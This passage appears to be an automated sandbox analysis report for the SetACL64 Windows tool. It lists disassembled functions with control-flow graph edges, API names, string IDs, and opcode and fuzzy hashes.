7ff7c171d006-7ff7c171d00a 3366->3371 3367->3371 3369->3362 3377 7ff7c171ce3d-7ff7c171ce50 3370->3377 3378 7ff7c171ce56 call 7ff7c17421a0 3370->3378 3381 7ff7c171d00c-7ff7c171d022 3371->3381 3382 7ff7c171d03e-7ff7c171d07d LeaveCriticalSection call 7ff7c1742180 3371->3382 3372->3358 3372->3373 3373->3364 3377->3358 3377->3378 3378->3369 3387 7ff7c171d039 call 7ff7c17421a0 3381->3387 3388 7ff7c171d024-7ff7c171d037 3381->3388 3387->3382 3388->3387 3396->3354 3398 7ff7c171cf66-7ff7c171cf7c 3396->3398 3399 7ff7c171cef8-7ff7c171cf0e 3397->3399 3400 7ff7c171cf2e-7ff7c171cf59 3397->3400 3401 7ff7c171cf97 call 7ff7c17421a0 3398->3401 3402 7ff7c171cf7e-7ff7c171cf91 3398->3402 3403 7ff7c171cf29 call 7ff7c17421a0 3399->3403 3404 7ff7c171cf10-7ff7c171cf23 3399->3404 3400->3396 3401->3354 3402->3376 3402->3401 3403->3400 3404->3376 3404->3403
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterEventFileLeaveModuleNameRegisterSource
                                                  • String ID: DefaultEventSource
                                                  • API String ID: 352910984-1672983561
                                                  • Opcode ID: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                                                  • Instruction ID: aded28a548baed820fa1c739a00e823b1fa218be891169acf6aa8f78bfef3ea0
                                                  • Opcode Fuzzy Hash: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                                                  • Instruction Fuzzy Hash: 48A17262B14B8185EF00AF76D4453AC6361EF587ACF918235E75C06ADBDFB8E194C350
                                                  Function 00007FF7C1701649 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$CloseDeregisterEventHandleSource
                                                  • String ID:
                                                  • API String ID: 1038480651-0
                                                  • Opcode ID: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                                                  • Instruction ID: 3c1a972f1d4270da3561ff82d53050e747fb7044f8f57448eec15de7b49b70e5
                                                  • Opcode Fuzzy Hash: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                                                  • Instruction Fuzzy Hash: 7C01ED21F08642D6FB54FF67AC98338E364BF8EB61F840135C94F46562CFACA4548720
                                                  Function 00007FF7C172B710 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3507 7ff7c172b710-7ff7c172b777 call 7ff7c1709520 call 7ff7c172bc40 3510 7ff7c172b779-7ff7c172b77d 3507->3510 3511 7ff7c172b783-7ff7c172b78c 3510->3511 3512 7ff7c172bba4-7ff7c172bbb6 call 7ff7c1709720 3510->3512 3511->3512 3513 7ff7c172b792-7ff7c172b7b1 call 7ff7c172a350 3511->3513 3518 7ff7c172bbe9-7ff7c172bbf7 3512->3518 3519 7ff7c172bbb8-7ff7c172bbca 3512->3519 3513->3512 3520 7ff7c172b7b7-7ff7c172b81b call 7ff7c17421d4 call 7ff7c1744d90 RegEnumKeyExW 3513->3520 3523 7ff7c172bbfa-7ff7c172bc20 call 7ff7c1742180 3518->3523 3521 7ff7c172bbcc-7ff7c172bbdf 3519->3521 3522 7ff7c172bbe4 call 7ff7c17421a0 3519->3522 3537 7ff7c172b81f-7ff7c172b826 3520->3537 3525 7ff7c172bc27-7ff7c172bc2c call 7ff7c17488fc 3521->3525 3526 7ff7c172bbe1 3521->3526 3522->3518 3534 7ff7c172bc2d-7ff7c172bc32 call 7ff7c17488fc 3525->3534 3526->3522 3541 7ff7c172bc33-7ff7c172bc38 call 7ff7c17488fc 3534->3541 3539 7ff7c172b82c-7ff7c172b849 3537->3539 3540 7ff7c172b920-7ff7c172b92a 3537->3540 3544 7ff7c172b850-7ff7c172b858 3539->3544 3542 7ff7c172b9df-7ff7c172b9e9 3540->3542 3543 7ff7c172b930-7ff7c172b933 3540->3543 3560 7ff7c172bc39-7ff7c172bc3f call 7ff7c1713e30 3541->3560 3549 7ff7c172b9eb RegCloseKey 3542->3549 3550 7ff7c172b9f1-7ff7c172ba02 3542->3550 3546 7ff7c172b93c-7ff7c172b93f 3543->3546 3547 7ff7c172b935-7ff7c172b93b RegCloseKey 3543->3547 3544->3544 3548 7ff7c172b85a-7ff7c172b86a call 7ff7c1713f80 3544->3548 3552 7ff7c172b97d-7ff7c172b98f call 7ff7c1709720 3546->3552 3553 7ff7c172b941-7ff7c172b956 3546->3553 3547->3546 3575 7ff7c172b88e-7ff7c172b8a6 call 7ff7c1710360 3548->3575 3576 7ff7c172b86c-7ff7c172b88c 3548->3576 3549->3550 3555 7ff7c172bb07-7ff7c172bb0a 3550->3555 3556 7ff7c172ba08-7ff7c172ba2e 3550->3556 3582 7ff7c172b991-7ff7c172b9a3 3552->3582 3583 7ff7c172b9c6-7ff7c172b9da 3552->3583 3561 7ff7c172b958-7ff7c172b96b 3553->3561 3562 7ff7c172b974-7ff7c172b97c call 7ff7c17421a0 3553->3562 3557 7ff7c172bb48-7ff7c172bb5a call 7ff7c1709720 3555->3557 3558 7ff7c172bb0c-7ff7c172bb21 3555->3558 3556->3560 3564 7ff7c172ba34-7ff7c172ba3c 3556->3564 3595 7ff7c172bb5c-7ff7c172bb6e 3557->3595 3596 7ff7c172bb91-7ff7c172bba2 3557->3596 3568 7ff7c172bb3f-7ff7c172bb47 call 7ff7c17421a0 3558->3568 3569 7ff7c172bb23-7ff7c172bb36 3558->3569 3573 7ff7c172bc21-7ff7c172bc26 call 7ff7c17488fc 3561->3573 3574 7ff7c172b971 3561->3574 3562->3552 3566 7ff7c172ba3e 3564->3566 3567 7ff7c172ba41-7ff7c172ba67 call 7ff7c170aa20 3564->3567 3566->3567 3598 7ff7c172ba69 3567->3598 3599 7ff7c172ba6c-7ff7c172babe call 7ff7c170ac70 call 7ff7c172b710 3567->3599 3568->3557 3569->3573 3580 7ff7c172bb3c 3569->3580 3573->3525 3574->3562 3587 7ff7c172b8aa-7ff7c172b8ae 3575->3587 3576->3587 3580->3568 3593 7ff7c172b9c1 call 7ff7c17421a0 3582->3593 3594 7ff7c172b9a5-7ff7c172b9b8 3582->3594 3583->3523 3590 7ff7c172b8b0-7ff7c172b8c6 3587->3590 3591 7ff7c172b8e6-7ff7c172b91b RegEnumKeyExW 3587->3591 3600 7ff7c172b8c8-7ff7c172b8db 3590->3600 3601 7ff7c172b8e1 call 7ff7c17421a0 3590->3601 3591->3537 3593->3583 3594->3525 3602 7ff7c172b9be 3594->3602 3604 7ff7c172bb8c call 7ff7c17421a0 3595->3604 3605 7ff7c172bb70-7ff7c172bb83 3595->3605 3596->3523 3598->3599 3613 7ff7c172bac0-7ff7c172bad6 3599->3613 3614 7ff7c172baf6-7ff7c172baff 3599->3614 3600->3534 3600->3601 3601->3591 3602->3593 3604->3596 3605->3525 3608 7ff7c172bb89 3605->3608 3608->3604 3615 7ff7c172bad8-7ff7c172baeb 3613->3615 3616 7ff7c172baf1 call 7ff7c17421a0 3613->3616 3614->3556 3617 7ff7c172bb05 3614->3617 3615->3541 3615->3616 3616->3614 3617->3555
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseEnum
                                                  • String ID:
                                                  • API String ID: 315095564-0
                                                  • Opcode ID: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
                                                  • Instruction ID: 914d9d67005cf21e7f36f1b7ca1c29b41540cfa393e1563727f1f0886c0662cc
                                                  • Opcode Fuzzy Hash: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
                                                  • Instruction Fuzzy Hash: D961C232B18B8285F710EF66E4403ADA3A5EB887A8F500135EF8C53A9ADF78D051C750
                                                  Function 00007FF7C174E62C Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2067211477-0
                                                  • Opcode ID: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                                                  • Instruction ID: 24f127fc41f9e0e952d20ee55ac6bbab45dcb549bf05b64fb1eae72a1728dd7f
                                                  • Opcode Fuzzy Hash: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                                                  • Instruction Fuzzy Hash: 60215E25B0974686FF14EF67A410179E3A0AF8CBB0F848430DE5D07756DEBCE4008B61
                                                  Function 00007FF7C1757C10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CompareString$try_get_function
                                                  • String ID: CompareStringEx
                                                  • API String ID: 3689094840-2590796910
                                                  • Opcode ID: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                                                  • Instruction ID: 4a61fa0eab4d71ecc733919939e1190e900c2ecbe9efee883d8996ec3b0dc485
                                                  • Opcode Fuzzy Hash: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                                                  • Instruction Fuzzy Hash: E511F936608B8186D760DF56B4402AAB7A5FBCDBA0F94413AEE8D43B5ACF7CD4548B40
                                                  Function 00007FF7C1757F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: DefaultUser$LocaleNametry_get_function
                                                  • String ID: GetUserDefaultLocaleName
                                                  • API String ID: 1828775994-151340334
                                                  • Opcode ID: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                                                  • Instruction ID: edaab89b8e1d54f2bf0d7111704106c3286351ea5a666a274e763ba5ce51cc1f
                                                  • Opcode Fuzzy Hash: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                                                  • Instruction Fuzzy Hash: B9F05E50F0894292EB55EF57B5916F89361AF4C7A0FC49035D90D07A97CFBC98898361
                                                  Function 00007FF7C17422FC Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 1321466686-0
                                                  • Opcode ID: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                                                  • Instruction ID: 79b4dc62a7f7f7314968b508b68f13b425b281d7f5ae80bbd9ee7cba72664c74
                                                  • Opcode Fuzzy Hash: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                                                  • Instruction Fuzzy Hash: 16312931A0860741FB54BF27A4553BDE3A0AF4D7A4FC44035EA4D076E7DEADE8188A71
                                                  Function 00007FF7C174B6DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: *
                                                  • API String ID: 3215553584-163128923
                                                  • Opcode ID: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
                                                  • Instruction ID: 63ec8852420c5f142cbff73d3cc76e35147c7597ff9be25ffa40b62356200c5d
                                                  • Opcode Fuzzy Hash: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
                                                  • Instruction Fuzzy Hash: A371BC76948212CAF768FF2A805417CB7A4EB0DB24F941135EA4A43296DFB8EC41DF60
                                                  Function 00007FF7C1701080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocErrorLast
                                                  • String ID: tss
                                                  • API String ID: 4252645092-1638339373
                                                  • Opcode ID: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
                                                  • Instruction ID: a437e884cd3b6906bf2eb92525be561199a43dd96f68cdb7ed3772c85e25f88a
                                                  • Opcode Fuzzy Hash: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
                                                  • Instruction Fuzzy Hash: 93014F31E4964782EB10BF36A884078A3A0BF9D374FD00631D65D827E6DFACD5558B20
                                                  Function 00007FF7C1759DFC Relevance: 4.6, APIs: 3, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                                                  • Instruction ID: 7ae05e16ff28f1a7c32a972365dba21a9590ea2966c38d7b6b707dca90ec1407
                                                  • Opcode Fuzzy Hash: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                                                  • Instruction Fuzzy Hash: C3317C32E0CA8289FB607F1694102BAA194AF5DBB0F944131EA6D066D7CEBCE4415B20
                                                  Function 00007FF7C171DB9A Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$ERROR,
                                                  • API String ID: 3988221542-2486372128
                                                  • Opcode ID: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
                                                  • Instruction ID: b4721f46d184218e9503a37eed21f357cb2438b1e8e365182179608edb50a7ee
                                                  • Opcode Fuzzy Hash: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
                                                  • Instruction Fuzzy Hash: 7E219D61A08A8284FF14EF17D54C3B9A762AB49BA4FD25435CA0D066E7DFECD444C360
                                                  Function 00007FF7C171DBB8 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$CRTCL,
                                                  • API String ID: 3988221542-3126492506
                                                  • Opcode ID: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
                                                  • Instruction ID: 228450d306aac999e74229b2dc48d41d79cfdc1e1e1a31bb5d5e2fc8ce1aa360
                                                  • Opcode Fuzzy Hash: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
                                                  • Instruction Fuzzy Hash: 43219D61A08A8284EF14EF17D54C3B9A762AB49BA4FD25435CA0D066E7DFECD444C360
                                                  Function 00007FF7C171DB7C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$WARN ,
                                                  • API String ID: 3988221542-3785767073
                                                  • Opcode ID: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
                                                  • Instruction ID: 81db650cce96e30ffddd3710b6291357cbcc35ffdd2882e3f1b672cf2b7b50b9
                                                  • Opcode Fuzzy Hash: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
                                                  • Instruction Fuzzy Hash: 0F219D61A08A8284EF14EF57D54C3B9A762AB49BA4FD25435CA0D066E7EFECD444C360
                                                  Function 00007FF7C171DBD6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$NONE ,
                                                  • API String ID: 3988221542-1825952341
                                                  • Opcode ID: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
                                                  • Instruction ID: d1144c11e0ce29cb90262dcb4cf4abff0b97fe317c2c22bf67a1cb50678f163d
                                                  • Opcode Fuzzy Hash: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
                                                  • Instruction Fuzzy Hash: CB219D61A0868284EF14EF17D54C3B9A762AB49BA4FD25431CA0D066E7EFECD444C360
                                                  Function 00007FF7C171DB6A Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
